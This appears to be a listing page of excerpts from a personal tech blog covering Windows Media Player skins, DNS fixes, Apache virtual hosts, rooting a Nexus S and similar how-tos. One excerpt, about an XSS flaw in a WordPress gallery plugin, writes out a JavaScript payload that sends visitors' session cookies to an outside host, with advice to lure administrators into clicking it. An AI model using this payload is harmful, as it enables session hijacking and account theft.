http://digitalpbk.blogspot.com/2006/12/how-to-make-windows-media-player-skins.html
How to make
Windows Media Player Skins
What is a WMP skin?WMP or
Windows Media Player Skin is a way of customizing how the media player looks. Basically a wmp skin is a .wmz file found on "X:\Program Files\
Windows Media Player\Skins\" folder (Replace X with your drive letter). Here we shall atempt to create a simple skin, from which you can create more advanced skins.WMZ File FormatWMP Skins consists of a collection of files zipped together. So it means, the WMZ file on your computer ...
Published 5 years, 5 months ago
http://digitalpbk.blogspot.com/2009/07/wordpress-nextgen-gallery-xss.html
code can be put for stealing the cookie:(new Image()).src =
'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location;='+window.location;window.location = "URL back to the page";Then post this link accessible to site administrators or other registered users to click and hand us over their session cookies ;)I am infected now what to do? (for webmaster)The XSS is due to blindly allowing to print the $_GET variable onto the title. The makers of this plug ...
Published 2 years, 10 months ago
http://digitalpbk.blogspot.com/2006/12/special-characters-for-orkut.html
Special characters for orkut
Recently analyzing the traffic to my site I found that some wanted to know how to insert special characters in Orkut, yeah the fancy one's... So here is the info for them ... Method 1If you are on
windows, take the character map from Start Menu > Programs > Accessories > System tools > Character Map. You will find all the special characters you need in there. Double clicking a character adds it to the text box below and when you have made your ...
Published 5 years, 5 months ago
http://digitalpbk.blogspot.com/2008/07/fix-server-not-found-dns-problem.html
Server Not Found page.There are some ways to resolve this.Get the correcet DNS IP address from the ISP, and get more than one.Get some free DNS IP address, some of which are given below67.138.54.100207.225.209.66208.67.220.220208.67.222.222Install a local caching dns server that caches servernames and ip address so that subsequent visits can be made faster since resolving is done locally.like Ubuntu debian package dnsmasqAdding name servers
Windows :Click TCP/IP and then click Properties.Add Primary ...
Published 3 years, 10 months ago
http://digitalpbk.blogspot.com/2007/12/virtual-hosts-apache-226-windows.html
Virtual Hosts on Apache 2.2.6 [
Windows]
What ?Virtual Hosts allow you to simulate multiple sites on a single server.i.e, One Server many Websites.Virtual Hosts is enabled by uncommenting the line :# Virtual hosts#Include conf/extra/httpd-vhosts.conf #Uncomment this lineon httpd.confThe virtual host conf file ./conf/extra/httpd-vhosts.confEg:## Virtual Hosts## If you want to maintain multiple domains/hostnames on your# machine you can setup VirtualHost containers for them. Most configurations ...
Published 4 years, 5 months ago
http://digitalpbk.com/hardware/sony-vaio-enable-battery-care-function-improve-battery-life
,
Take Vaio Control Center (from Control panel or by typing Vaio Control Center in the start menu).
On left side click Power management and then click on the Battery sub item
Click on enable Battery care function as shown below.
Uncheck it to disable battery care function.
Click on advanced and choose 80%
If your computer is charged to 100%, unplug from the power source, and let the battery go below 80%.
Now you should see lesser battery degradation. :)
Download Battery Care
Windows ...
Published 2 years, 1 month ago
http://digitalpbk.com/less-css/less-css-compiler-windows-lesscexe
Less CSS Compiler for
Windows (lessc.exe)
LESS is a language that helps CSS Designers to write better manageable and extensible CSS style sheets.
Current less compiler called lessc is only available for the *nix platforms, which can compile LESS files to CSS.
Where is lessc.exe ?
lessc.exe for those who are in a hurry :) .
It is attached to the bottom of this post also so feel free to read on.
How to use the lessc.exe
This compiler is adapted from the .net port of less compiler ...
Published 1 year ago
http://digitalpbk.com/nexus-s/how-to-root-nexus-s-windows
How to easily unlock and root the Samsung Google Nexus S on
Windows
Easily root your Google Nexus S or the i9023/i9020 manufactured by Samsung by following these simple steps. There are plenty of rooting steps out there but all of them required you to download a lot of files and do a lot of complicated steps. Moreover not one worked for me fully. Skip to the rooting steps
What is rooting? Why should I root ?
By default your Nexus S phone comes with default users and many system functionality ...
Published 6 months, 1 week ago
http://digitalpbk.com/wireless-laptop-tv/connect-laptop-to-tv-wireless-intel-widi
LM, 2620LM, 2630UM, 2610UM, 2530UM, 2920XM
Intel Core i5: 580M, 560M, 540M, 520M, 480M, 460M, 450M, 430M, 580UM, 560UM, 540UM, 520UM, 470UM, 430UM, 2540M, 2520M, 2410M, 2537M
Intel Core i3: 390M, 380M, 370M, 350M, 330M, 330E, 2310M
Intel HD Graphics works. Investigating whether non Intel graphics like NVidia work. ATI seems to be not supported.
It should run
Windows 7 32bit or 64bit.
Before we go into the Hardware requirements of the TV, let us look at the software installations ...
Published 6 months, 3 weeks ago
http://digitalpbk.blogspot.com/2007/03/auto-mounting-file-systems-in-linux.html
Auto mounting File Systems in Linux
Some Linux Distros (like Fedora Core 6 FC6) do not automatically mount the local file systems such as FAT/FAT32 systems that belong to the
windows drive. To mount and unmount file systems you must be logged on as a root user or must have root privilegesMounting ManuallyFirst change to root@localhost ~]$ suPassword: Passwordroot@localhost ]# mount -t Filesystem Device DirectoryMounting the file system manually is done by the mount command.Filesystem is vfat ...
Published 5 years, 2 months ago